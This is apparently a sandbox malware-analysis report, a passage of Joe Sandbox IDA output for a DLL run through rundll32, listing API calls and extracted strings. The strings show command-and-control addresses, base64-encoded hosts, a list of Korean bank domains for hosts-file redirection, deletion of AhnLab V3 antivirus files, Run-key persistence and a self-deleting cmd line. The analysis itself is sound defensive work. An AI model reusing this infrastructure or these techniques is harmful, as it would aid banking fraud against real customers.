                                                • VirtualProtect.KERNEL32(003CB200,00000200,10021770,10021517,?,10021770,00000000,10021517), ref: 100219F2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
                                                • Instruction ID: 3cf54787ec1993463bbc57c4f2f394104f3851b60521f152caf73e44949bcc96
                                                • Opcode Fuzzy Hash: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
                                                • Instruction Fuzzy Hash: 0B614A7AA001219FDB21CF24DC907E9B7B1EFA5350FA505A4D889AB381D770ADC2CB90
                                                APIs
                                                • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C305,00000000), ref: 1000C1B0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ControlDevice
                                                • String ID:
                                                • API String ID: 2352790924-0
                                                • Opcode ID: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                • Instruction ID: 86cc3cd5e500d09f34f504799c04322c58a7eb8eb055a7fb12ab9f39681c7df9
                                                • Opcode Fuzzy Hash: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                • Instruction Fuzzy Hash: 98F0A96228A3C29EE302CB688855BD2FFA47B76710F0CD7C9E1D85B283C2548598D766
                                                APIs
                                                • InternetReadFile.WININET(?,?,000000FF,?), ref: 100049A4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: FileInternetRead
                                                • String ID:
                                                • API String ID: 778332206-0
                                                • Opcode ID: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
                                                • Instruction ID: 239b56050324291377b7f4a21ae448826d8efed17bf8fca953d792130a950d08
                                                • Opcode Fuzzy Hash: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
                                                • Instruction Fuzzy Hash: B7C002B9608301BFDA04CB94C888D6BB7E9EBC8340F00C90CF59983210C734E841CB22
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,100069B2,00000002,00000000,00000000,00000000), ref: 10004AAA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3332741929-0
                                                • Opcode ID: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
                                                • Instruction ID: 1bfc50ff904c48d483376f5291371ce4043d81f8e4f06f90ef1f9d0dc718a3ab
                                                • Opcode Fuzzy Hash: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
                                                • Instruction Fuzzy Hash: 9CB09279104200ABD204DB60C984C2BBBE9BB94310B008808F48582110C631D840CB21

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006A7E
                                                  • Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
                                                  • Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(10000000,c:\agtve\yhnvs.dll,00000104), ref: 10006AA7
                                                  • Part of subcall function 10006A50: strrchr.MSVCRT ref: 10006AD5
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AED
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AFE
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006B0F
                                                • PathFileExistsA.SHLWAPI(c:\test.1), ref: 1000BB32
                                                • GetCurrentProcessId.KERNEL32 ref: 1000BB3C
                                                  • Part of subcall function 10004FF0: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,74DF0F00), ref: 10004FFD
                                                  • Part of subcall function 10004FF0: TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                  • Part of subcall function 10004FF0: CloseHandle.KERNEL32(00000000), ref: 10005017
                                                • ExitProcess.KERNEL32 ref: 1000BB4D
                                                • CreateMutexA.KERNEL32(00000000,00000001,Mkrnaver.com:6520), ref: 1000BB5D
                                                • GetLastError.KERNEL32 ref: 1000BB63
                                                • Sleep.KERNEL32(000007D0), ref: 1000BC33
                                                • DeleteFileA.KERNEL32(?), ref: 1000BC36
                                                • CreateThread.KERNEL32(00000000,00000000,10009230,00000000,00000000,00000000), ref: 1000BC5B
                                                • Sleep.KERNEL32(000003E8), ref: 1000BC62
                                                Strings
                                                • c:\windows\system32, xrefs: 1000BC0B
                                                • Mkrnaver.com:6520, xrefs: 1000BB54
                                                • cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s", xrefs: 1000BE1C
                                                • c:\wiseman.exe, xrefs: 1000BBF8, 1000BC12
                                                • d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p, xrefs: 1000BCAA
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 1000BCE3
                                                • http://107.163.241.232:12354/show.php, xrefs: 1000BCB9
                                                • c:\test.1, xrefs: 1000BB2D
                                                • SeDebugPrivilege, xrefs: 1000BB7F
                                                • c:\agtve, xrefs: 1000BE13
                                                • krnaver.com:6520, xrefs: 1000BC8D, 1000BD0B
                                                • MTc0LjEzOS42NS44Njo1NjU4MA==, xrefs: 1000BC6D
                                                • c:\agtve\ReadMe.txt, xrefs: 1000BB8E, 1000BBDA
                                                • 123, xrefs: 1000BBBA
                                                • aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw, xrefs: 1000BC7E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FileProcesswsprintf$CreateModuleNameSleep$CloseCurrentDeleteErrorExistsExitHandleLastMutexOpenPathTerminateThreadstrrchr
                                                • String ID: 123$MTc0LjEzOS42NS44Njo1NjU4MA==$Mkrnaver.com:6520$SeDebugPrivilege$aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw$c:\agtve$c:\agtve\ReadMe.txt$c:\test.1$c:\windows\system32$c:\wiseman.exe$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"$d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p$http://107.163.241.232:12354/show.php$krnaver.com:6520$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 666504283-1075761258
                                                • Opcode ID: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
                                                • Instruction ID: c2b964bca94a91e70f938dacfcc7d80519b83498a4bbcf2bec864d40d2c1bd09
                                                • Opcode Fuzzy Hash: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
                                                • Instruction Fuzzy Hash: 0171EE75784B007BF220E6B49C47FAA3581DB85B95F210224F706BE1C6EEE4FA44816E

                                                Control-flow Graph

                                                APIs
                                                • wsprintfA.USER32 ref: 10007863
                                                  • Part of subcall function 10004940: InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpenwsprintf
                                                • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                                • API String ID: 4197039022-1204782975
                                                • Opcode ID: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
                                                • Instruction ID: 095fe5dde53d71875dce48b6fc83110d19f8d3916a50ec2a0be112dbd884ee86
                                                • Opcode Fuzzy Hash: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
                                                • Instruction Fuzzy Hash: 8DD16B75E041446FEB14CF68CC81BFEBBA5FB442A0F10426EF9199B281DB769E01C7A1

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                                • String ID: http://
                                                • API String ID: 2221484516-1121587658
                                                • Opcode ID: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
                                                • Instruction ID: c21daf10c3e951720ad3e589d1e55667024fa973de2a3a3a443ae2c0494599a8
                                                • Opcode Fuzzy Hash: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
                                                • Instruction Fuzzy Hash: 1E5104312043046BE314CB34CC44BEBB3D9FFC9350F404A2CFA5997280EB79DA1886A6

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,74DF0F00,10005086,00000000,self), ref: 10004DFC
                                                • strrchr.MSVCRT ref: 10004E09
                                                • CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                • time.MSVCRT(00000000), ref: 10004E7F
                                                • _localtime32.MSVCRT(?), ref: 10004E8E
                                                • strftime.MSVCRT ref: 10004EA1
                                                • vsprintf.MSVCRT ref: 10004EF3
                                                • sprintf.MSVCRT ref: 10004F13
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10004F3D
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10004F44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                                • String ID: %s%s$MZ@$log.txt
                                                • API String ID: 2392943451-673521906
                                                • Opcode ID: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                • Instruction ID: d5d278936535e4cba90bc0b152de8e4c93260a9cf759ec48f07ff2ba3d5d953d
                                                • Opcode Fuzzy Hash: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                • Instruction Fuzzy Hash: DF41B5B1148345AFE328CB74CC899EB7BA9EBC8350F404A2DF75A872D0DFB499098651

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                  • Part of subcall function 10001000: 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                • Sleep.KERNEL32(0000EA60), ref: 10009288
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092D3
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092DF
                                                • Sleep.KERNEL32(000927C0), ref: 10009420
                                                • wsprintfA.USER32 ref: 10009471
                                                • Sleep.KERNEL32(000927C0), ref: 100094CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep$DirectorySystem$lstrcpywsprintf
                                                • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.241.232:12354/show.php$iOffset
                                                • API String ID: 2291147283-888787304
                                                • Opcode ID: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
                                                • Instruction ID: b8854392ff10616702e47e0bcfff7711cc3888a46334cdc6d8595219f0281411
                                                • Opcode Fuzzy Hash: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
                                                • Instruction Fuzzy Hash: B55146756046446BE365C674CC52BEB36C6EBC82D0F100A3CF64A872C6EE71EA498692

                                                Control-flow Graph

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6EA
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6F9
                                                  • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                  • Part of subcall function 10001000: 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                • Sleep.KERNEL32(000927C0), ref: 1000B822
                                                • wsprintfA.USER32 ref: 1000B8A7
                                                • Sleep.KERNEL32(000927C0), ref: 1000B8D5
                                                Strings
                                                • http://107.163.241.232:12354/show.php, xrefs: 1000B7DB
                                                • 127.0.0.1, xrefs: 1000B8B5
                                                • cmd.exe /c ipconfig /flushdns, xrefs: 1000B8C4
                                                • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B716
                                                • 8.8.8.8, xrefs: 1000B8B0
                                                • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B6FB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepSystem$lstrcpywsprintf
                                                • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.232:12354/show.php
                                                • API String ID: 2704893763-1395296613
                                                • Opcode ID: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
                                                • Instruction ID: 0c20509c5945297f8f237a4b3797596a51a84c821cbe864c7c2b37f26de8eee8
                                                • Opcode Fuzzy Hash: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
                                                • Instruction Fuzzy Hash: CC518D71504A486BE364CA74CC91AEB3BCAEB893D0F104A3CF7468B2D5EE71D948C391

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062
                                                  • Part of subcall function 10004C70: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,74DF0F10,?,1000AAC6,?,74DF0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                  • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                                • String ID: %u MB$09121307$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.232:12354/show.php
                                                • API String ID: 2543995030-394306148
                                                • Opcode ID: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
                                                • Instruction ID: 3ad2bcc863b837c91c8faade8dea923d340ec5ffd05ed7ea934ab2fdf9765298
                                                • Opcode Fuzzy Hash: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
                                                • Instruction Fuzzy Hash: 8041F5766002045BE714CA28DC81BAB77D6FBC8350F544A2CFA59CB2C5EE78E908C796

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DeleteFile$wsprintf
                                                • String ID: %s\ASDSvc.exe$%s\V3Lite.exe$C:\1.vbs$InstallPath$U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==
                                                • API String ID: 1588361905-790033058
                                                • Opcode ID: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
                                                • Instruction ID: 1dfada7e8b5ca1f324769cc69037653655a4e6411eba5475badaeff67279124f
                                                • Opcode Fuzzy Hash: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
                                                • Instruction Fuzzy Hash: E2110AB65043447EE714D264DC82EEBB7A9EBC8350F00892DF74897141EAB8A54C87A3

                                                Control-flow Graph

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 10008D13
                                                  • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                • GetLastError.KERNEL32 ref: 10008D2C
                                                • CloseHandle.KERNEL32(00000000), ref: 10008D9E
                                                  • Part of subcall function 10007800: wsprintfA.USER32 ref: 10007863
                                                • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 10008D60
                                                • CreateThread.KERNEL32 ref: 10008D7C
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008D87
                                                • CloseHandle.KERNEL32(00000000), ref: 10008D8E
                                                • Sleep.KERNEL32(0002BF20), ref: 10008D99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                                • String ID: 0x5d65r455f$5655029807
                                                • API String ID: 3565103679-1179119988
                                                • Opcode ID: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
                                                • Instruction ID: 7f0c169c507e5996f06a3fa8500c359fcd6d382ddda4958c890d8906a17dfaa3
                                                • Opcode Fuzzy Hash: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
                                                • Instruction Fuzzy Hash: 90112BB664021477F361D7609C4AFAA3748E755391F014231FB05991C6DA749514C3A7

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 1000c3e0-1000c42a Netbios 400 1000c42c-1000c43e 399->400 401 1000c43f-1000c447 399->401 402 1000c449-1000c466 Netbios 401->402 403 1000c48e-1000c4ee Netbios 401->403 402->403 406 1000c468-1000c475 402->406 404 1000c4f0-1000c502 403->404 405 1000c503-1000c572 sprintf 403->405 406->402 407 1000c477-1000c479 406->407 407->403 408 1000c47b-1000c48d 407->408
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Netbios
                                                • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                                • API String ID: 544444789-1505804699
                                                • Opcode ID: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
                                                • Instruction ID: 728b9448df0537b33cd7c33a8ad28386f52a8ed2ab8d8cf9ed196ef958deebfa
                                                • Opcode Fuzzy Hash: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
                                                • Instruction Fuzzy Hash: E141BC361187829BD724CB68C8107FBB7E5EFC4354F44483DA5D48B682DAB8A6098793

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 409 1000b9b0-1000b9fc call 10010f90 412 1000ba01-1000ba1f RegOpenKeyExA 409->412 413 1000ba25-1000ba55 RegQueryInfoKeyA 412->413 414 1000baf8-1000bb0e RegCloseKey Sleep 412->414 413->414 415 1000ba5b-1000ba63 413->415 414->412 415->414 416 1000ba69-1000bac2 415->416 418 1000bac4-1000bad6 416->418 419 1000baeb-1000baf2 416->419 418->419 421 1000bad8-1000bae4 418->421 419->414 419->416 421->419
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA17
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA4D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 1000BAFD
                                                • Sleep.KERNEL32(000493E0), ref: 1000BB08
                                                Strings
                                                • svchsot.exe, xrefs: 1000BAC8
                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA0D
                                                Memory Dump Source
